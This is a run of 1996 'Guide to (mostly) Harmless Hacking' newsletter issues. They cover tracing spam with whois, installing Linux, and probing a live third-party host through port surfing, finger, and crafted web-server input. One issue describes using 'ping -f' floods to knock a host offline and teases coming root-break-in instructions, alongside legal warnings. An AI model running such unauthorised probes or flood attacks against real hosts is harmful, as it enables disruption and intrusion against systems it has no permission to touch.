How about chex.heaven.com? Maybe it is the place where spam originated? I
type in:
telnet chex.heaven.com 79
This is the finger port. I get:
Trying 206.17.180.2 ...
telnet: connect: Connection timed out
I then try to get a screen that would ask me to login with user name, but
once again get "Connection timed out."
This suggests strongly that neither heaven.com or chex.heaven.com are being
used by people to send email. So this is probably a forged link in the header.
Let's look at another link on the header:
whois gnn.com
The answer is:
America Online (GNN2-DOM)
8619 Westwood Center Drive
Vienna, VA 22182
USA
Domain Name: GNN.COM
Administrative Contact:
Colella, Richard (RC1504) col...@AOL.NET
703-453-4427
Technical Contact, Zone Contact:
Runge, Michael (MR1268) ru...@AOL.NET
703-453-4420
Billing Contact:
Lyons, Marty (ML45) ma...@AOL.COM
703-453-4411
Record last updated on 07-May-96.
Record created on 22-Jun-93.
Domain servers in listed order:
DNS-01.GNN.COM 204.148.98.241
DNS-AOL.ANS.NET 198.83.210.28
Whoa! GNN.com is owned by America Online. Now America Online, like
Compuserve, is a computer network of its own that has gateways into the
Internet. So it isn't real likely that heaven.com would be routing email
through AOL, is it? It would be almost like finding a header that claims its
email was routed through the wide area network of some Fortune 500
corporation. So this gives yet more evidence that the first link in the
header, heaven.com, was forged.
In fact, it's starting to look like a good bet that our spammer is some
newbie who just graduated from AOL training wheels. Having decided there is
money in forging spam, he or she may have gotten a shell account offered by
the AOL subsidiary, GNN. Then with a shell account he or she could get
seriously into forging email.
Sounds logical, huh? Ah, but let's not jump to conclusions. This is just a
hypothesis and it may be wrong. So let's check out the remaining link in
this header:
whois att.net
The answer is:
AT&T EasyLink Services (ATT2-DOM)
400 Interpace Pkwy
Room B3C25
Parsippany, NJ 07054-1113
US
Domain Name: ATT.NET
Administrative Contact, Technical Contact, Zone Contact:
DNS Technical Support (DTS-ORG) hostm...@ATTMAIL.COM
314-519-5708
Billing Contact:
Gardner, Pat (PG756) pega...@ATTMAIL.COM
201-331-4453
Record last updated on 27-Jun-96.
Record created on 13-Dec-93.
Domain servers in listed order:
ORCU.OR.BR.NP.ELS-GMS.ATT.NET199.191.129.139
WYCU.WY.BR.NP.ELS-GMS.ATT.NET199.191.128.43
OHCU.OH.MT.NP.ELS-GMS.ATT.NET199.191.144.75
MACU.MA.MT.NP.ELS-GMS.ATT.NET199.191.145.136
Another valid domain! So this is a reasonably ingenious forgery. The culprit
could have sent email from any of heaven.com, gnn.com or att.net. We know
heaven.com is highly unlikely because we can't get even the login port to
work. But we still have gnn.com and att.net as suspected homes for this spammer.
The next step is to email a copy of this spam *including headers* to both
postm...@gnn.com (usually a good guess for the email address of the person
who takes complaints) and ru...@AOL.NET, who is listed by whois as the
technical contact. We should also email either postm...@att.net (the good
guess) or hostm...@ATTMAIL.COM (technical contact).
Presumably one of the people reading email sent to these addresses will use
the email message id number to look up who forged this email. Once the
culprit is discovered, he or she usually is kicked out of the ISP.
But here is a shortcut. If you have been spammed by this guy, lots of other
people probably have been, too. There's a news group on the Usenet where
people can exchange information on both email and Usenet spammers,
news.admin.net-abuse.misc. Let's pay it a visit and see what people may have
dug up on FR...@heaven.com. Sure enough, I find a post on this heaven scam:
From: bart...@helium.iecorp.com (Matt Bartley)
Newsgroups: news.admin.net-abuse.misc
Subject: junk email - Free B 4 U - FR...@Heaven.com
Supersedes: <4uvq4a$3...@helium.iecorp.com>
Date: 15 Aug 1996 14:08:47 -0700
Organization: Interstate Electronics Corporation
Lines: 87
Message-ID: <4v03kv$7...@helium.iecorp.com>
NNTP-Posting-Host: helium.iecorp.com
(snip)
No doubt a made-up From: header which happened to hit a real domain
name.
Postmasters at att.net, gnn.com and heaven.com notified. gnn.com has
already stated that it came from att.net, forged to look like it came from
gnn. Clearly the first Received: header is inconsistent.
Now we know that if you want to complain about this spam, the best place to
send a complaint is postm...@att.net.
But how well does writing a letter of complaint actually work? I asked ISP
owner Dale Amon. He replied, "From the small number of spam messages I have
been seeing - given the number of generations of exponential net growth I
have seen in 20 years - the system appears to be *strongly* self regulating.
Government and legal systems don't work nearly so well.
"I applaud Carolyn's efforts in this area. She is absolutely right. Spammers
are controlled by the market. If enough people are annoyed, they respond. If
that action causes problems for an ISP it puts it in their economic interest
to drop customers who cause such harm, ie the spammers. Economic interest is
often a far stronger and much more effective incentive than legal requirement.
"And remember that I say this as the Technical Director of the largest ISP
in Northern Ireland."
How about suing spammers? Perhaps a bunch of us could get together a class
action suit and drive these guys into bankruptcy?
Systems administrator Terry McIntyre argues, "I am opposed to attempts to
sue spammers. We already have a fairly decent self-policing mechanism in place.
"Considering that half of everybody on the internet are newbies (due to the
100% growth rate), I'd say that self-policing is marvelously effective.
"Invite the gov't to do our work for us, and some damn bureaucrats will
write up Rules and Regulations and Penalties and all of that nonsense. We
have enough of that in the world outside the 'net; let's not invite any of
it to follow us onto the 'net."
So it looks like Internet professionals prefer to control spam by having net
vigilantes like us track down spammers and report them to their ISPs. Sounds
like phun to me! In fact, it would be fair to say that without us net
vigilantes, the Internet would probably grind to a halt from the load these
spammers would place on it.
OK, I'm signing off for this column. I look forward to your contributions to
this list. Have some vigilante phun -- and don't get busted!
__________________________________________________________________
Want to share some kewl stuph? Tell me I'm terrific? Flame me? For the first
two, I'm at cme...@techbroker.com. Please direct flames to
dev/nu...@techbroker.com. Happy hacking!
_______________________________________________________
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly)
HARMLESS HACKING as long as you leave this notice at the end. To subscribe,
email cme...@techbroker.com with message "subscribe hacker
<joe....@boring.ISP.net>" substituting your real email address for Joe Blow's.
___________________________________________________________________
Si.
Smaug
_____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 2 Number 2
Linux!
______________________________________________________________
Unix has become the primo operating system of the Internet. In fact,
Unix is the most widely used operating system in the world among computers
with more power than PCs.
True, Windows NT is coming up fast as a common Internet operating system,
and is sooo wonderfully buggy that it looks like it could become the number
one favorite to crack into. But today Unix in all its wonderful flavors
still is the operating system to know in order to be a truly elite hacker.
So far we have assumed that you have been hacking using a shell
account that you get through your Internet Service Provider (ISP). A shell
account allows you to give Unix commands on one of your ISP's computers. But
you don't need to depend on your ISP for a machine that lets you play with
Unix. You can run Unix on your own computer and with a SLIP or PPP
connection be directly connected to the Internet.
***********************
Newbie note: Serial Line Internet Protocol (SLIP) and Point-to-Point
Protocol (PPP) connections give you a temporary Internet Protocol (IP)
address that allows you to be hooked directly to the Internet. You have to
use either SLIP or PPP connections to get to use a Web browser that gives
you pictures instead on text only. So if you can see pictures on the Web,
you already have one of these available to you.
The advantage of using one of these direct connections for your
hacking activities is that you will not leave behind a shell log file for
your ISP's sysadmin to pore over. Even if you are not breaking the law, a
shell log file that shows you doing lots of hackerish stuph can be enough
for some sysadmins to summarily close your account.
********************
What is the best kind of computer to run Unix on? Unless you are a
wealthy hacker who thinks nothing of buying a Sun SPARC workstation, you'll
probably do best with some sort of PC. There are almost countless variants
of Unix that run on PCs. Most of them are free for download, or
inexpensively available on CD-ROMs.
The three primary variations of Unix that run on PCs are Sun's
Solaris, FreeBSD and Linux. Solaris costs around $700. Enough said. FreeBSD
is really, really good but doesn't offer a lot of support. Linux, however,
has the advantage of being available in many variants (so you can have fun
mixing and matching programs from different Linux offerings). Most
importantly, Linux is supported by many news groups, mail lists and Web
sites. If you have hacker friends in your area, most of them probably use
Linux and can help you out.
*********************
Historical note: Linux was created in 1991 by a group led by Linus Torvalds
of the University of Helsinki. Linux is copyrighted under the GNU General
Public License. Under this agreement, Linux may be redistributed to anyone
along with the source code. Anyone can sell any variant of Linux and modify
it and repackage it. But even if someone modifies the source code he or she
may not claim copyright for anything created from Linux. Anyone who sells a
modified version of Linux must provide source code to the buyers and allow
them to reuse it in their commercial products without charging licensing
fees. This arrangement is known as a "copyleft."
Under this arrangement the original creators of Linux receive no
licensing or shareware fees. Linus Torvalds and the many others who have
contributed to Linux have done so from the joy of programming and a sense of
community with all of us who will hopefully use Linux in the spirit of good
guy hacking. Viva la Linux! Viva Torvalds!
**********************
Linux consists of the operating system itself (called the "kernel")
plus a set of associated programs.
The kernel, like all types of Unix, is a multitasking, multi-user
operating system. Although it uses a different file structure, and hence is
not directly compatible with DOS and Windows, it is so flexible that many
DOS and Windows programs can be run while in Linux. So a power user will
probably want to boot up in Linux and then be able to run DOS and Windows
programs from Linux.
Associated programs that come with most Linux distributions may include:
* a shell program (Bourne Again Shell -- BASH -- is most common);
* compilers for programming languages such as Fortran-77 (my favorite!), C,
C++, Pascal, LISP, Modula-2, Ada, Basic (the best language for a beginner),
and Smalltalk.;
* X (sometimes called X-windows), a graphical user interface
* utility programs such as the email reader Pine (my favorite) and Elm
Top ten reasons to install Linux on your PC:
1. When Linux is outlawed, only outlaws will own Linux.
2. When installing Linux, it is so much fun to run fdisk without backing up
first.
3. The flames you get from asking questions on Linux newsgroups are of a
higher quality than the flames you get for posting to alt.sex.bestiality.
4. No matter what flavor of Linux you install, you'll find out tomorrow
there was a far more 3l1te version you should have gotten instead.
5. People who use Free BSD or Solaris will not make fun of you. They will
offer their sympathy instead.
6. At the next Def Con you'll be able to say stuph like "so then I su-ed to
his account and grepped all his files for 'kissyface'." Oops, grepping
other people's files is a no-no, forget I ever suggested it.
7. Port surf in privacy.
8. One word: scripts.
9. Installing Linux on your office PC is like being a postal worker and
bringing an Uzi to work.
10. But - - if you install Linux on your office computer, you boss won't
have a clue what that means.
What types of Linux work best? It depends on what you really want.
Redhat Linux is famed for being the easiest to install. The Walnut Creek
Linux 3.0 CD-ROM set is also really easy to install -- for Linux, that is!
My approach has been to get lots of Linux versions and mix and match the
best from each distribution.
I like the Walnut Creek version best because with my brand X
hardware, its autodetection feature was a life-saver.
INSTALLING LINUX is not for the faint of heart! Several tips for
surviving installation are:
1) Although you in theory can run Linux on a 286 with 4 MB RAM and two
floppy drives, it is *much* easier with a 486 or above with 8 MB RAM, a
CD-ROM, and at least 200 MB free hard disk space.
2) Know as much as possible about what type of mother board, modem, hard
disk, CD-ROM, and video card you have. If you have any documentation for
these, have them on hand to reference during installation.
3) It works better to use hardware that is name-brand and somewhat out of
date on your computer. Because Linux is freeware, it doesn't offer device
drivers for all the latest hardware. And if your hardware is like mine --
lots of Brand X and El Cheapo stuph, you can take a long time experimenting
with what drivers will work.
4) Before beginning installation, back up your hard disk(s)! In theory you
can install Linux without harming your DOS/Windows files. But we are all
human, especially if following the advice of 3).
5) Get more than one Linux distribution. The first time I successfully
installed Linux, I finally hit on something that worked by using the boot
disk from one distribution with the CD-ROM for another. In any case, each
Linux distribution had different utility programs, operating system
emulators, compilers and more. Add them all to your system and you will be
set up to become beyond elite.
6) Buy a book or two or three on Linux. I didn't like any of them! But they
are better than nothing. Most books on Linux come with one or two CD-ROMs
that can be used to install Linux. But I found that what was in the books
did not exactly coincide with what was on the CD-ROMs.
7) I recommend drinking while installing. It may not make debugging go any
faster, but at least you won't care how hard it is.
Now I can almost guarantee that even following all these 6 pieces of
advice, you will still have problems installing Linux. Oh, do I have 7
advisories up there? Forget number 7. But be of good cheer, since everyone
else also suffers mightily when installing and using Linux, the Internet has
an incredible wealth of resources for the Linux-challenged.
If you are allergic to getting flamed, you can start out with Linux
support Web sites.
The best I have found is http://sunsite.unc.edu:/pub/Linux/. It
includes the Linux Frequently Asked Questions list (FAQ), available from
sunsite.unc.edu:/pub/Linux/docs/FAQ.
In the directory /pub/Linux/docs on sunsite.unc.edu you'll find a
number of other documents about Linux, including the Linux INFO-SHEET and
META-FAQ,
The Linux HOWTO archive is on sunsite.unc.edu:/pub/Linux/docs/HOWTO.
The directory /pub/Linux/docs/LDP on sunsite.unc.edu contains the current
set of LDP manuals.
You can get ``Linux Installation and Getting Started'' from
sunsite.unc.edu in /pub/Linux/docs/LDP/install-guide. The README file
there describes how you can order a printed copy of the book of the same
name (about 180 pages).
Now if you don't mind getting flamed, you may want to post questions
to the amazing number of Usenet news groups that cover Linux. These include:
comp.os.linux.advocacy Benefits of Linux compared
comp.os.linux.development.system Linux kernels, device drivers
comp.os.linux.x Linux X Window System servers
comp.os.linux.development.apps Writing Linux applications
comp.os.linux.hardware Hardware compatibility
comp.os.linux.setup Linux installation
comp.os.linux.networking Networking and communications
comp.os.linux.answers FAQs, How-To's, READMEs, etc.
linux.redhat.misc
alt.os.linux Use comp.os.linux.* instead
alt.uu.comp.os.linux.questions Usenet University helps you
comp.os.linux.announce Announcements important to Linux
comp.os.linux.misc Linux-specific topics
Tobin Fricke has also pointed out that "free copies of Linux CD-ROMs
are available the Linux Support & CD Givaway web site at
http://emile.math.ucsb.edu:8000/giveaway.html. This is a project where
people donate Linux CD's that they don't need any more. The project was
seeded by Linux Systems Labs, who donated 800 Linux CDs initially! Please
remember to donate your Linux CD's when you are done with them. If you live
near a computer swap meet, Fry's, Microcenter, or other such place, look for
Linux CD's there. They are usually under $20, which is an excellent
investment. I personally like the Linux Developer's Resource by Infomagic,
which is now up to a seven CD set, I believe, which includes all major Linux
distributions (Slackware, Redhat, Debian, Linux for DEC Alpha to name a few)
plus mirrors of tsx11.mit.edu and sunsite.unc.edu/pub/linux plus much more.
You should also visit the WONDERFUL linux page at
http://sunsite.unc.edu/linux, which has tons of information, as well as the
http://www.linux.org/. You might also want to check out
http://www.redhat.com/ and http://www.caldera.com/ for more information on
commercial versions of linux (which are still freely available under GNU)."
How about Linux security? Yes, Linux, like every operating system,
is imperfect. Eminently hackable, if you really want to know. So if you want
to find out how to secure your Linux system, or if you should come across
one of the many ISPs that use Linux and want to go exploring (oops, forget I
wrote that), here's where you can go for info:
ftp://info.cert.org/pub/cert_advisories/CA-94:01.network.monitoring.attacks
ftp://info.cert.org/pub/tech_tips/root_compromise
http://bach.cis.temple.edu/linux/linux-security/
Last but not least, if you want to ask Linux questions on the Happy
Hacker list, you're welcome. We may be the blind leading the blind, but what
the heck!
_________________________________________________________
Want to see back issues of Guide to (mostly) Harmless Hacking? See
http://www.feist.com/~tqdb/evis-unv.html. Want to subscribe to this list?
Email majo...@edm.net with the message "subscribe happyhacker." Want to
share some kewl stuph with the Happy Hacker list? Send your messages to
h...@edm.net. To send me confidential email (please, no discussions of
illegal activities) use cme...@techbroker.com. Please direct flames to
dev/nu...@techbroker.com. Happy hacking!
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly)
HARMLESS HACKING as long as you leave this notice at the end..
________________________________________________________
--------------------------------------------------------------------
This message is from the HappyHacker mailing list. To unsubscribe,
send mail to majo...@edm.net saying "unsubscribe happyhacker". The
HappyHacker page is at http://www.feist.com/~tqdb/evis-unv.html. This
mailing list is provided by The EDM Network (http://www.edm.net/) as
a public service and is not responsible for its content.
--------------------------------------------------------------------
Carolyn Meinel
M/B Research -- The Technology Brokers
si. hey, we're mostly though "g" in the first directory... only 20+ more to go
Smaug
doesnt exist.
--
_______________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 1 Number 6
It's vigilante phun day one more time! How to nuke offensive Web sites.
_______________________________________________________
How do we deal with offensive Web sites?
Remember that the Internet is voluntary. There is no law that forces an ISP
to serve people they don't like. As the spam kings Jeff Slayton, Crazy
Kevin, and, oh, yes, the original spam artists Cantor and Siegal have
learned, life as a spammer is life on the run. The same holds for Web sites
that go over the edge.
The reason I bring this up is that a Happy Hacker list member has told me he
would like to vandalize kiddie porn sites. I think that is a really, really
kewl idea -- except for one problem. You can get thrown in jail! I don't
want the hacker tools you can pick up from public Web and ftp sites to lure
anyone into getting busted. It is easy to use them to vandalize Web sites.
But it is hard to use them without getting caught!
*****************
YOU CAN GO TO JAIL NOTE: Getting into a part of a computer that is not open
to the public is illegal. In addition, if you use the phone lines or
Internet across a US state line to break into a non-public part of a
computer, you have committed a Federal felony. You don't have to cause any
harm at all -- it's still illegal. Even if you just gain root access and
immediately break off your connection -- it's still illegal. Even if you are
doing what you see as your civic duty by vandalizing kiddie porn -- it's
still illegal.
***************
Here's another problem. It took just two grouchy hacker guys to get the
DC-stuff list turned off . Yes, it *will* be back, eventually. But what if
the Internet were limited to carrying only stuff that was totally
inoffensive to everyone? That's why it is against the law to just nuke ISPs
and Web servers you don't like. Believe me, as you will soon find out, it is
really easy to blow an Internet host off the Internet. It is *so* easy that
doing this kind of stuph is NOT elite!
So what's the legal alternative to fighting kiddie porn? Trying to throw Web
kiddie porn guys in jail doesn't always work. While there are laws against
it in the US, the problem is that the Internet is global. Many countries
have no laws against kiddie porn on the Internet. Even if it were illegal
everywhere, in lots of countries the police only bust people in exchange for
you paying a bigger bribe than the criminal pays.
*******************
They can go to jail note: In the US and many other countries, kiddie porn is
illegal. If the imagery is hosted on a physical storage device within the
jurisdiction of a country with laws against it, the person who puts this
imagery on the storage device can go to jail. So if you know enough to help
the authorities get a search warrant, by all means contact them. In the US,
this would be the FBI.
*******************
But the kind of mass outrage that keeps spammers on the run can also drive
kiddie porn off the Web. *We* have the power.
The key is that no one can force an ISP to carry kiddie porn -- or anything
else. In fact, most human beings are so disgusted at kiddie porn that they
will jump at the chance to shut it down. If the ISP is run by some pervert
who wants to make money by offering kiddie porn, then you go to the next
level up, to the ISP that provides connectivity for the kiddie porn ISP.
There someone will be delighted to cut off the b*****ds.
So, how do you find the people who can put a Web site on the run? We start
with the URL.
I am going to use a real URL. But please keep in mind that I am not saying
this actually is a web address with kiddie porn. This is being used for
purposes of illustration only because this URL is carried by a host with so
many hackable features. It also, by at least some standards, carries X-rated
material. So visit it at your own risk.
Now let's say someone just told you this was a kiddie porn site. Do you just
launch an attack? No.
This is how hacker wars start. What if phreak.org is actually a nice guy
place? Even if they did once display kiddie porn, perhaps they have
repented. Not wanting to get caught acting on a stupid rumor, I go to the
Web and find the message "no DNS entry." So this Web site doesn't look like
it's there just now.
But it could just be the that the machine that runs the disk that holds this
Web site is temporarily down. There is a way to tell if the computer that
serves a domain name is running: the ping command:
/usr/etc/ping phreak.org
The answer is:
/usr/etc/ping: unknown host phreak.org
Now if this Web site had been up, it would have responded like my Web site does:
/usr/etc/ping techbroker.com
This gives the answer:
techbroker.com is alive
*************************
Evil Genius Note: Ping is a powerful network diagnostic tool. This example
is from BSD Unix. Quarterdeck Internet Suite and many other software
packages also offer this wimpy version of the ping command. But in its most
powerful form -- which you can get by installing Linux on your computer --
the ping-f command will send out packets as fast as the target host can
respond for an indefinite length of time. This can keep the target extremely
busy and may be enough to put the computer out of action. If several people
do this simultaneously, the target host will almost certainly be unable to
maintain its network connection. So -- *now* do you want to install Linux?
*************************
*************************
Netiquette warning: "Pinging down" a host is incredibly easy. It's way too
easy to be regarded as elite, so don't do it to impress your friends. If you
do it anyhow, be ready to be sued by the owner of your target and kicked off
your ISP-- or much worse! If you should accidentally get the ping command
running in assault mode, you can quickly turn it off by holding down the
control key while pressing the "c" key.
*************************
*************************
You can go to jail warning: If it can be shown that you ran the ping-f
command on purpose to take out the host computer you targeted, this is a
denial of service attack and hence illegal.
************************
OK, now we have established that at least right now, http://phreak.com
either does not exist, or else that the computer hosting it is not connected
to the Internet.
But is this temporary or is it gone, gone, gone? We can get some idea
whether it has been up and around and widely read from the search engine at
http://altavista.digital.com. It is able to search for links embedded in Web
pages. Are there many Web sites with links to phreak.org? I put in the
search commands:
link: http://www.phreak.org
host: http://www.phreak.org
But they turn up nothing. So it looks like the phreak.org site is not real
popular.
Well, does phreak.org have a record at Internic? Let's try whois:
whois phreak.org
Phreaks, Inc. (PHREAK-DOM)
Phreaks, Inc.
1313 Mockingbird Lane
San Jose, CA 95132 US
Domain Name: PHREAK.ORG
Administrative Contact, Billing Contact:
Connor, Patrick (PC61) p...@PHREAK.ORG
(408) 262-4142
Technical Contact, Zone Contact:
Hall, Barbara (BH340) ra...@PHREAK.ORG
408.262.4142
Record last updated on 06-Feb-96.
Record created on 30-Apr-95.
Domain servers in listed order:
PC.PPP.ABLECOM.NET 204.75.33.33
ASYLUM.ASYLUM.ORG 205.217.4.17
NS.NEXCHI.NET 204.95.8.2
Next I wait a few hours and ping phreak.org again. I discover it is now
alive. So now we have learned that the computer hosting phreak.org is
sometimes connected to the Internet and sometimes not. (In fact, later
probing shows that it is often down.)
I try telnetting to their login sequence:
telnet phreak.org
Trying 204.75.33.33 ...
Connected to phreak.org.
Escape character is '^]'.
______________ _______________________________ __
___ __ \__ / / /__ __ \__ ____/__ |__ //_/____________________ _
__ /_/ /_ /_/ /__ /_/ /_ __/ __ /| |_ ,< _ __ \_ ___/_ __ `/
_ ____/_ __ / _ _, _/_ /___ _ ___ | /| |__/ /_/ / / _ /_/ /
/_/ /_/ /_/ /_/ |_| /_____/ /_/ |_/_/ |_|(_)____//_/ _\__, /
/____/
;
Connection closed by foreign host.
Aha! Someone has connected the computer hosting phreak.org to the Internet!
The fact that this gives just ASCII art and no login prompt suggests that
this host computer does not exactly welcome the casual visitor. It may well
have a firewall that rejects attempted logins from anyone who telnets in
from a host that is not on its approved list.
Next I finger their technical contact:
finger ra...@phreak.org
Its response is:
[phreak.org]
It then scrolled out some embarrassing ASCII art. Finger it yourself if you
really want to see it. I'd only rate it PG-13, however.
The fact that phreak.org runs a finger service is interesting. Since finger
is one of the best ways to crack into a system, we can conclude that either:
1) The phreak.org sysadmin is not very security-conscious, or
2) It is so important to phreak.org to send out insulting messages that the
sysadmin doesn't care about the security risk of running finger.
Since we have seen evidence of a fire wall, case 2 is probably true.
One of the Happy Hacker list members who helped me by reviewing this Guide,
William Ryan, decided to further probe phreak.org's finger port:
"I have been paying close attention to all of the "happy hacker" things that
you have posted. When I tried using the port 79 method on phreak.org, it
connects and then displays a hand with its middle finger raised and the
comment "UP YOURS." When I tried using finger, I get logged on and a
message is displayed shortly thereafter "In real life???""
Oh, this is just *too* tempting...ah, but let's keep out of trouble and just
leave that port 79 alone, OK?
Now how about their HTML port, which would provide access to any Web sites
hosted by phreak.org? We could just bring up a Web surfing program and take
a look. But we are hackers and hackers never do stuph the ordinary way.
Besides, I don't want to view dirty pictures and naughty words. So we check
to see if it is active with, you guessed it, a little port surfing:
telnet phreak.org 80
Here's what I get:
Trying 204.75.33.33 ...
Connected to phreak.org.
Escape character is '^]'.
HTTP/1.0 400 Bad Request
Server: thttpd/1.00
Content-type: text/html
Last-modified: Thu, 22-Aug-96 18:54:20 GMT
<HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD>
<BODY><H2>400 Bad Request</H2>
Your request '' has bad syntax or is inherently impossible to satisfy.
<HR>
<ADDRESS><A
HREF="http://www.acme.org/software/thttpd/">thttpd/1.00</A></ADDRESS
</BODY></HTML>
Connection closed by foreign host.
Now we know that phreak.org does have a web server on its host computer.
This server is called thttpd, version 1.0. We also may suspect that it is a
bit buggy!
What makes me think it is buggy? Look at the version number: 1.0. Also,
that's a pretty weird error message.
If I were the technical administrator for phreak.org, I would get a better
program running on port 80 before someone figures out how to break into root
with it. The problem is that buggy code is often a symptom of code that
takes the lazy approach of using calls to root. In the case of a Web server,
you want to give read-only access to remote users in any user's directories
of html files. So there is a huge temptation to use calls to root.
And a program with calls to root just might crash and dump you out into root.
************************
Newbie note: Root! It is the Valhalla of the hard-core cracker. "Root" is
the account on a multi-user computer which allows you to play god. You
become the "superuser"! It is the account from which you can enter and use
any other account, read and modify any file, run any program. With root
access, you can completely destroy all data on boring.ISP.net or any other
host on which you gain root. (I am *not* suggesting that you do so!)
*************************
Oh, this is just too tempting. I do one little experiment:
telnet phreak.org 80
This gives:
Trying 204.75.33.33 ...
Connected to phreak.org.
Escape character is '^]'.
Because the program on port 80 times out on commands in a second or less, I
was set up ready to do a paste to host command, which quickly inserted the
following command:
<ADDRESS><A
HREF="http://www.phreak.org/thttpd/">thttpd/1.00</A></ADDRESS</BODY></HTML>
This gives information on phreak.org's port 80 program:
HTTP/1.0 501 Not Implemented
Server: thttpd/1.00
Content-type: text/html
Last-modified: Thu, 22-Aug-96 19:45:15 GMT
<HTML><HEAD><TITLE>501 Not Implemented</TITLE></HEAD>
<BODY><H2>501 Not Implemented</H2>
The requested method '<ADDRESS><A' is not implemented by this server.
<HR>
<ADDRESS><A HREF="http://www.acme.org/software/thttpd/">thttpd/1.00</A></ADDRESS
</BODY></HTML>
Connection closed by foreign host.
All right, what is thttpd? I do a quick search on Altavista and get the answer:
A small, portable, fast, and secure HTTP server. The tiny/turbo/throttling
HTTP server does not fork and is very careful about memory...
But did the programmer figure out how to do all this without calls to root?
Just for kicks I try to access the acme.org URL and get the message "does
not have a DNS entry." So it's off-line, too. But whois tells me it is
registered with Internic. Hmm, this sounds even more like brand X software.
And it's running on a port. Break-in city! What a temptation...arghhh...
Also, once again we see an interesting split personality. The phreak.org
sysadmin cares enough about security to get a Web server advertised as
"secure." But that software shows major symptoms of being a security risk!
So what may we conclude? It looks like phreak.org does have a Web site. But
it is only sporadically connected to the Internet.
Now suppose that we did find something seriously bad news at phreak.org.
Suppose someone wanted to shut it down. Ah-ah-ah, don't touch that buggy
port 80! Or that tempting port 79! Ping in moderation, only!
********************************
You can go to jail note: Are you are as tempted as I am? These guys have
notorious cracker highway port 79 open, AND a buggy port 80! But, once
again, I'm telling you, it is against the law to break into non-public parts
of a computer. If you telnet over US state lines, it is a federal felony.
Even if you think there is something illegal on that thttpd server, only
someone armed with a search warrant has the right to look it over from the
root account.
********************************
First, if in fact there were a problem with phreak.org (remember, this is
just being used as an illustration) I would email a complaint to the
technical and administrative contacts of the ISPs that provide phreak.org's
connection to the Internet. So I look to see who they are:
whois PC.PPP.ABLECOM.NET
I get the response:
[No name] (PC12-HST)
Hostname: PC.PPP.ABLECOM.NET
Address: 204.75.33.33
System: Sun 4/110 running SunOS 4.1.3
Record last updated on 30-Apr-95
In this case, since there are no listed contacts, I would email
postm...@ABLECOM.NET.
I check out the next ISP:
whois ASYLUM.ASYLUM.ORG
And get:
[No name] (ASYLUM4-HST)
Hostname: ASYLUM.ASYLUM.ORG
Address: 205.217.4.17
System: ? running ?
Record last updated on 30-Apr-96.
Again, I would email postm...@ASYLUM.ORG
I check out the last ISP:
whois NS.NEXCHI.NET
And get:
NEXUS-Chicago (BUDDH-HST)
1223 W North Shore, Suite 1E
Chicago, IL 60626
Hostname: NS.NEXCHI.NET
Address: 204.95.8.2
System: Sun running Unix
Coordinator:
Torres, Walter (WT51) walt...@MSN.COM
312-352-1200
Record last updated on 31-Dec-95.
So in this case I would email walt...@MSN.COM with evidence of the
offending material. I would also email complaints to
postm...@PC.PPP.ABLECOM.NET and postmaster@ ASYLUM.ASYLUM.ORG.
That's it. Instead of waging escalating hacker wars that can end up getting
people thrown in jail, document your problem with a Web site and ask those
who have the power to cut these guys off to do something. Remember, you can
help fight the bad guys of cyberspace much better from your computer than
you can from a jail cell.
*************************
Netiquette alert: If you are just burning with curiosity about whether
thttpd can be made to crash to root, *DON'T* run experiments on phreak.org's
computer. The sysadmin will probably notice all those weird accesses to port
80 on the shell log file. He or she will presume you are trying to break in,
and will complain to your ISP. You will probably lose your account.
*************************
*************************
Evil Genius note: The symptoms of being hackable that we see in thttpd are
the kind of intellectual challenge that calls for installing Linux on your
PC. Once you get Linux up you could install thttpd. Then you may experiment
with total impunity.
If you should find a bug in thttpd that seriously compromises the security
of any computer running it, then what do you do? Wipe the html files of
phreak.org? NO! You contact the Computer Emergency Response Team (CERT) at
http://cert.org with this information. They will send out an alert. You will
become a hero and be able to charge big bucks as a computer security
consultant. This is much more phun than going to jail. Trust me.
************************
OK, I'm signing off for this column. I look forward to your contributions to
this list. Happy hacking -- and don't get busted!
__________________________________________________________________
Want to share some kewl stuph? Tell me I'm terrific? Flame me? For the first
two, I'm at cme...@techbroker.com. Please direct flames to
dev/nu...@techbroker.com. Happy hacking!
_______________________________________________________
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly)
Smaug
_____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 2 Number 1
Internet for Dummies -- skip this if you are a Unix wizard. But if you read
on you'll get some more kewl hacking instructions.
______________________________________________________________
The six Guides to (mostly) Harmless Hacking of Vol. 1 jumped immediately
into how-to hacking tricks. But if you are like me, all those details of
probing ports and playing with hypotheses and pinging down hosts gets a
little dizzying.
So how about catching our breath, standing back and reviewing what the heck
it is that we are playing with? Once we get the basics under control, we
then can move on to serious hacking.
Also, I have been wrestling with my conscience over whether to start giving
you step-by-step instructions on how to gain root access to other peoples'
computers. The little angel on my right shoulder whispers, "Gaining root
without permission on other people's computers is not nice. So don't tell
people how to do it." The little devil on my left shoulder says, "Carolyn,
all these hackers think you don't know nothin'! PROOVE to them you know how
to crack!" The little angel says, "If anyone reading Guide to (mostly)
Harmless Hacking tries out this trick, you might get in trouble with the law
for conspiracy to damage other peoples' computers." The little devil says,
"But, Carolyn, tell people how to crack into root and they will think you
are KEWL!"
So here's the deal. In this and the next few issues of Guide to (mostly)
Harmless Hacking I'll tell you several ways to get logged on as the
superuser in the root account of some Internet host computers. But the
instructions will leave a thing or two to the imagination.
My theory is that if you are willing to wade through all this, you probably
aren't one of those cheap thrills hacker wannabes who would use this
knowledge to do something destructive that would land you in jail.
*****************************
Technical tip: If you wish to become a *serious* hacker, you'll need Linux
(a freeware variety of Unix) on your PC. One reason is that then you can
crack into root legally all you want -- on your own computer. It sure beats
struggling around on someone else's computer only to discover that what you
thought was root was a cleverly set trap and the sysadmin and FBI laugh at
you all the way to jail.
Linux can be installed on a PC with as little as a 386 CPU, only 2 Mb RAM
and as little as 20 MB of hard disk. You will need to reformat your hard
disk. While some people have successfully installed Linux without trashing
their DOS/Windows stuff, don't count on getting away with it. Backup,
backup, backup!
*****************************
*****************************
You can go to jail warning: Crack into root on someone else's computer and
the slammer becomes a definite possibility. Think about this: when you see a
news story about some hacker getting busted, how often do you recognize the
name? How often is the latest bust being done to someone famous, like Dark
Tangent or se7en or Emmanuel Goldstein? How about, like, never! That's
because really good hackers figure out how to not do stupid stuff. They
